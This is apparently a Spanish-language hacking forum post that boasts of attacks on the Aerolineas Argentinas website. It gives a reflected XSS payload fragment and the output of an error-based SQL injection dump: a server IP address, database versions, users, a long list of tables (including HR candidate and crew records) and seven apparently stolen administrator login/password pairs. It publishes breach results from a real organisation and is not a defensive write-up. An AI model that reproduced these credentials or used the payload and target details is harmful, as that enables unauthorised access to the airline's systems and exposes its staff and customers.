XSS Reflected Error Based "Aerolineas Argentinas"

Path vulnerable=You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login[XSS]


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

• /%29%3C/script%3E&UI_LOCALE=&pnr=&motivo=&nocont=1

si, es un sqli de doble consulta basada en error, pero no esta en ese path.

Busque otra falla pero en sql inyeccion 



Target:         You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Host IP:        200.5.89.232
(to be continue...)
(continue)
Web Server:     Microsoft-IIS/6.0
Powered-by:     You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
DB Server:     MSSQL 2000 with error
Resp. Time(avg):    417 ms
Current User:     web
Sql Version:     Microsoft SQL Server 2005 - 9.00.5057.00 (Intel X86)
    Mar 25 2011 13:50:04
    Copyright (c) 1988-2005 Microsoft Corporation
    Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

Current DB:     Web_Prod
System User:     web
Host Name:     WH2K305B
Server Name:     WH2K305B\AA2005
        master
        tempdb
        model
        msdb
        Web_Prod

------------------------------------------------------------------------------------------
TABLES:
--------------------------------------------------------------------------------------------
AR_2K7_DiccionarioCorto
AR_2K7_DiccionarioLargo
AR_2K7_EnlacesDeIdiomas
AR_2K7_Escalas
AR_2K7_EscalasOLD
AR_2K7_Frames
AR_2K7_HomeBannerRotativo
AR_2K7_HomeFlash
AR_2K7_HomeImagenesPromociones
AR_2K7_HomeReservaCheckinActivado
Table found: AR_2K7_Idiomas
Table found: AR_2K7_Imagenes
Table found: AR_2K7_Items
Table found: AR_2K7_LinkHomeImportante
Table found: AR_2K7_Nodos
Table found: AR_2K7_OrigenDeImagenes
Table found: AR_2K7_Paginas
Table found: AR_2K7_ParametrosTripFlow
Table found: AR_2K7_ParametrosTripFlowVariantes
Table found: AR_2K7_ParametrosTripFlowVariantesLargas
Table found: AR_2K7_PerfilDeEscala
Table found: AR_2K7_RelacionIdiomasItems
Table found: AR_2K7_RelacionSitiosPaginas
Table found: AR_2K7_Sitios
Table found: AR_CAC_Novedades_Ultimas
Table found: AR_CYBER_Admin
Table found: AR_CYBER_Agencias
Table found: AR_CYBER_Compras
Table found: AR_ENCUESTA_Preguntas
Table found: AR_ENCUESTA_Respuestas
Table found: AR_ENCUESTA_Resultado
Table found: AR_Intranet_AeroNews
Table found: AR_Intranet_AeroNews_Notas
Table found: AR_Intranet_AeroNews_PDF
Table found: AR_Intranet_BeneficiosExcursiones
Table found: AR_Intranet_BeneficiosPromociones
Table found: AR_Intranet_Hoteles
Table found: AR_intranet_LaPosta_PDF
Table found: AR_OPER_Curriculum
Table found: AR_OPTAR_Admin
Table found: AR_OPTAR_Destinos
Table found: AR_OPTAR_Hoteles
Table found: AR_RRHH_Academico
Table found: AR_RRHH_Candidatos
Table found: AR_RRHH_Conocimientos
Table found: AR_RRHH_Domicilio
Table found: AR_RRHH_Estado_Civil
Table found: AR_RRHH_Institutos
Table found: AR_RRHH_Nacionalidad
Table found: AR_RRHH_Nivel_Estudios
Table found: AR_RRHH_Paises
Table found: AR_RRHH_Patentes
Table found: AR_RRHH_Profesional
Table found: AR_RRHH_Provincias
Table found: AR_RRHH_Puesto
Table found: AR_RRHH_Tipo_Documentos
Table found: AR_RRHH_Titulos
Table found: AR_TCP_AGENDA
Table found: AR_TCP_Curriculum
Table found: AR_TCP_Destinatarios
Table found: AR_TCP_dias_vaca
Table found: AR_TCP_dias_vaca_2011
Table found: AR_TCP_Funciones
Table found: AR_TCP_Hoteles
Table found: AR_TCP_LineasVuelo
Table found: AR_TCP_Mensajes
Table found: AR_TCP_Novedades
Table found: AR_TCP_NovedadesOLD
Table found: AR_TCP_Postas
Table found: AR_TCP_Subsecciones
Table found: AR_TCP_TelEmpresa
Table found: AR_TCP_TelHoteles
Table found: AR_TCP_Temario
Table found: AR_TCP_Tramites
Table found: AR_TCP_Tripulantes
Table found: AR_TCP_VACACIONES
Table found: AR_TCP_Vacaciones_Tomadas
Table found: AR_WEB_2Banners
Table found: AR_WEB_AccesosRapidos
Table found: AR_WEB_Aeropuertos
Table found: AR_WEB_ArteBA
Table found: AR_WEB_BannerCentral
Table found: AR_WEB_BannersFijos
Table found: AR_WEB_BeneficioPlusOfertas
Table found: AR_WEB_BuscadorVuelos
Table found: AR_WEB_Calendario_Club23
Table found: AR_WEB_Calendario_Congresos
Table found: AR_WEB_Calendario_Empresas
Table found: AR_WEB_CallCenters
Table found: AR_WEB_Cargas
Table found: AR_WEB_CheckPromoVencidas
Table found: AR_WEB_ChicosDibujos
Table found: AR_WEB_ChicosFamosos
Table found: AR_WEB_ChicosHistorietas
Table found: AR_WEB_ChicosJuegos
Table found: AR_WEB_ChicosRespuestas
Table found: AR_WEB_ChicosRevista
Table found: AR_WEB_CombosPaisesActual
Table found: AR_WEB_Compras_Contratos
Table found: AR_WEB_Compras_ContratosOLD
Table found: AR_WEB_ConcursoCatupecuParticipantes
Table found: AR_WEB_ConcursoCatupecuSorteados
Table found: AR_WEB_ConcursoContestaYGana
Table found: AR_WEB_ConcursoContestaYGanaSorteados_A
Table found: AR_WEB_ConcursoContestaYGanaSorteados_B
Table found: AR_WEB_ConcursoContestaYGanaSorteados_C
Table found: AR_WEB_ConcursoContestaYGanaSorteados_D
Table found: AR_WEB_ConcursoDiaDelAmigoParticipantes
Table found: AR_WEB_ConcursoDiaDelAmigoParticipantes_Ponderado
Table found: AR_WEB_ConcursoDiaDelAmigoSorteados
Table found: AR_WEB_ConcursoDiaDelPadreParticipantes
Table found: AR_WEB_ConcursoDiaDelPadreParticipantes_Ponderado
Table found: AR_WEB_ConcursoDiaDelPadreSorteados
Table found: AR_WEB_ConcursoLosCafreParticipantes
Table found: AR_WEB_ConcursoLosCafreParticipantes_Ponderado
Table found: AR_WEB_ConcursoLosCafreSorteados
Table found: AR_WEB_ConcursoMinisterioParticipantes
Table found: AR_WEB_ConcursoMinisterioParticipantes_Ponderado
Table found: AR_WEB_ConcursoMinisterioSorteados
Table found: AR_WEB_ConcursoRugby
Table found: AR_WEB_ConcursoRugbySorteados
Table found: AR_WEB_ConcursoSecretarias
Table found: AR_WEB_ConcursoSecretariasSorteados
Table found: AR_WEB_ConcursoShoppings_2011_12_16a31
Table found: AR_WEB_ConcursoShoppings_2012_01_01a15
Table found: AR_WEB_ConcursoShoppings_2012_01_16a31
Table found: AR_WEB_ConcursoShoppings_2012_02_01a15
Table found: AR_WEB_ConcursoShoppings_2012_02_16a29
Table found: AR_WEB_ConcursoShoppings_2012_03_01a15
Table found: AR_WEB_ConcursoShoppings_2012_03_16a31
Table found: AR_WEB_ConcursoShoppings_2012_04_01a15
Table found: AR_WEB_ConcursoShoppings_2012_04_16a30
Table found: AR_WEB_ConcursoShoppings_2012_05_01a15
Table found: AR_WEB_ConcursoShoppings_2012_05_16a31
Table found: AR_WEB_ConcursoShoppings_2012_06_01a14
Table found: AR_WEB_ConcursoShoppings_2012_06_15a30
Table found: AR_WEB_ConcursoShoppingsSorteados
Table found: AR_WEB_ConcursoShoppingsSorteados_2012_02_01a15
Table found: AR_WEB_ConcursoShoppingsSorteados_2012_02_16a29
Table found: AR_WEB_ConcursoShoppingsSorteados_2012_03_01a15
Table found: AR_WEB_ConcursoShoppingsSorteados_2012_03_16a31
Table found: AR_WEB_ConcursoShoppingsSorteados_2012_04_01a15
Table found: AR_WEB_ConcursoShoppingsSorteados_2012_04_16a30
Table found: AR_WEB_ConcursoShoppingsSorteados_2012_05_01a15
Table found: AR_WEB_ConcursoShoppingsSorteados_2012_05_16a31
Table found: AR_WEB_ConcursoShoppingsSorteados_2012_06_01a14
Table found: AR_WEB_ConcursoShoppingsSorteados_2012_06_15a30
Table found: AR_WEB_CondicionesTarjetas
Table found: AR_WEB_DescripcionProgramacion
Table found: AR_WEB_DestinoMensual
Table found: AR_WEB_Direcciones
Table found: AR_WEB_DondeViajar
Table found: AR_WEB_Emails
Table found: AR_WEB_Empresa_paro
Table found: AR_WEB_Escalas
Table found: AR_WEB_FiltrarCheckIn
Table found: AR_WEB_FormaDePago

ADMIN:
--------------------------------------------------------------------------------------------
password login
arau1 29754
arsa1 OP125
arsa2 17114
arsa5 25766
d23342 23342
lore2009 28578
zoecita 25533
--------------------------------------------------------------------------------------------

Muy bien Hack742!